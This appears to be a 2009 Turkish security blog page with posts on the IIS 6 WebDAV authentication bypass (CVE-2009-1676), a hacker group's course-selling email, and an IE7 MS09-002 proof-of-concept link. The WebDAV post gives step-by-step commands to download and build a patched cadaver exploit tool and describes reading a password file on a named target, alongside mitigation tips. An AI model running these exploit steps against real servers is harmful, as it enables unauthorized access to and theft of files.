Bilgi Güvenliği Günlüğü.

22 May 2009

Microsoft IIS6 WebDav Remote Auth Bypass Güvenlik Zaafiyeti

CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.

Web sunucuda bulunan klasorlere ve dosyalara erişim için Windows Authentication gerektiren kimlik doğrulama unicode kullanılarak bypass edilebiliniyor.
Yetki dahilinde dosya okumak, dizin listelemek ve uzak sunucuya dosya yazmak (içerik eklemek) mümkün.

Bu makalede bu işlemin nasıl yapıldığı ve korunma yollarına değinilmiştir.

Aktif Webdav Servisinin Tespiti

IIS 5.0 da Webdav servisi varsayılan olarak açık gelir.IIS 6.0 sunucularda ise webdav servisi varsayılan olarak aktif değildir.

IIS sunucuda Webdav servisinin aktif olduğunu Nmap NSE sciprti ve Enumaration araçları ile tespit edebiliriz.

Nmap NSE scriptine http://ack-rst.com/scripts/webdav.nse adresinden ulaşabilirsiniz.

Nmap ile ozan.net adresindeki IIS 6 sunucunun Webdav servisinin aktif olduğunu öğrendik.

Exploit (Suistimal)

Bu zaafiyeti kullanarak hedef sistemde yapılacak işlemler hakkında aşağıdaki videoyu izleyebilirsiniz.

http://www.cehturkiye.com/iis6webdav/iis6webdav.html

Bilgisayarınıza indirmek için ;
http://www.4shared.com/file/107065019/de6006aa/iis6webdavvulnerabilty.html

Skullsecurity.org tarafından açığı sömüren otomize edilmiş bir betik yayımlandı.

Kurulumu ve kullanımı aşağıdaki gibidir ;
1-mkdir webdav
2-cd webdav
3-wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
——
4-wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
——
5-tar xzvf cadaver-0.23.2.tar.gz
——
6- cd cadaver-0.23.2/
7- patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
7-./configure
——
8- make
——

Yukarıdaki adımlardan sonra “cadaver” aracı kurulmuş olucak.

./cadaver xx.xx.xx.xx şeklinde kullanabilirsiniz.

Artık dav:/> satırına düştükden sonra savunmasız dizine geçebilir.Neler olduğunu görüntüleyerek yetki dahilinde istediğiniz işlemi yapabilirsiniz.

Yapılacak işlemler için aşağıdaki komutlar kullanılır ;
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE

ozan.net hedefi exploit edilerek, “gizli” klasorundeki “parola.txt” içeriği okunmuştur.

Bu zaafiyetten korunmak için;
- Webdav servisi kullanılmıyorsa kapatın.
-Webdav ile paylaşılan klasorlerin/dosyaların yetkilerini düzenleyin
-Microsoft’un yama çıkarmasını bekleyin :(
-Eğer bir IDS/IPS sisteminiz var imza veritabanını güncelleyin.

14 March 2009

Script Kiddie’ler İş Başında -Dalaverelere Aldanmayın !

Filed under: Haberler — admin @ 21:28

Selamlar,
Bugu, kendilerini “hacker” diye adlandırılan bir gruptan gelen maili görüşleriniz için burada paylaşıyorum ;

Merhaba, CYBERPROTEST
BelirLi Aciklarla veya Programlarla Rastgele Karsiniza Cikan Web Sitelerini HackleyebiLirsiniz. Ama Her Zaman Dedigimiz Gibi Bunlarin Hicbir Onemi Yoktur, OnemLi Olan Her Zaman Toplumsal ve Ulusal Olaylarda Tepkinizi Koymanizdir Taki Bir MISYON’a Bagliysaniz. Bu Yuzden Diyoruz ki Bu Isi Profesyonel Olarak Yapmak Istiyorsaniz Hayatta Belki Karsiniza Bir Kez Cikacak Olan Hack3r Trainer Egitim Setimizi Almanizi Oneririz. Bu Egitim Setimizde Normal Bir Bilgisayar Kullanicisi Olsaniz Bile Setimizde Ogreneceginizi Kesin Garanti Edebiliyoruz.

CYBERPROTEST TIM Yoneticileri Tarafindan Ozenle Hazirlanmis Olan Videolar ve Dokumanlar (KESINLIKLE PIYASADA Bulunan Dokumanlarla Karistirmayin) Hepsi Sadece Bize Ait O Kadar Detaya Indik ki Anlamamaniz Imkansiz Taki Heves Yoksa Oda Yukarda Belirttigimiz Gibi Biraz Istek ve Biraz Bilgisayar Tecrubesi Sayesinde Sizde Profesyonel olarak Bu Isi Yapabileceksiniz…

Hack3r Trainer Setimiz Sinirli Sayidadir. Set Hakkinda Genis Bilgi Sahibi Olmak Istiyorsaniz Lutfen Ziyaret Ediniz. http://www.cyberprotest.org/Forum/index.php/topic,14243.0.html

CYBERPROTEST TIM Olarak Bu Hafta Sonunda Turkiye’de Buyuk Ses Getirecek Onemli TURK Web Sitelerine GerekLi Uyarilarimizi Yapacagiz. Her Zaman Dedigimiz Gibi TURK WEBMASTER ‘larinin Yanindayiz…

Milw0rm amaleleri, türk sitelerinin anasayfalarını değiştirerek yazdıkları “hacked bilmem kim” , “ownz by şu bu” gibi yazılar ile türk webmasterının emeklerini ve web sitelerinin kariyerini hiçe sayarak sözde “uyarı” yaptıklarını söyleyen bir script kiddie topluluğunun çevirdiği oyunlara kanmayın.
Mouse’un ayarını bozsam düzeltemeyecek kapasitedeki bu şahısların eğitim setini çok merak ediyorum.

Bu gibi dalaverelere kanmayınız,  şiddetle ikaz ediyorum.

Saygılarımla …

22 February 2009

MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

Filed under: Güvenlik,Haberler — Tags: , — admin @ 20:40

Microsoft İnternet Explorer 7 de kritik bir güvenlik açığı bulundu.
Microsoftun MS09-002 güvenlik bülteni ile doğruladığı bu güvenlik açığı uzakdan kod çalıştırmaya olanak tanıyor.

İnternet Explorer 7 kullanan windows sistemlerini etkileyen bu güvenlik açığı için microsoft yama yayımladı.Güvenliğiniz için windows updatelerini yüklemenizi öneririm.

İlgili Microsoft güvenlik bülteni ;
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx

MS IE7 Memory Corruption PoC Exploit;
http://www.milw0rm.com/exploits/8079

Güvenli Günler …

Older Posts »

Powered by WordPress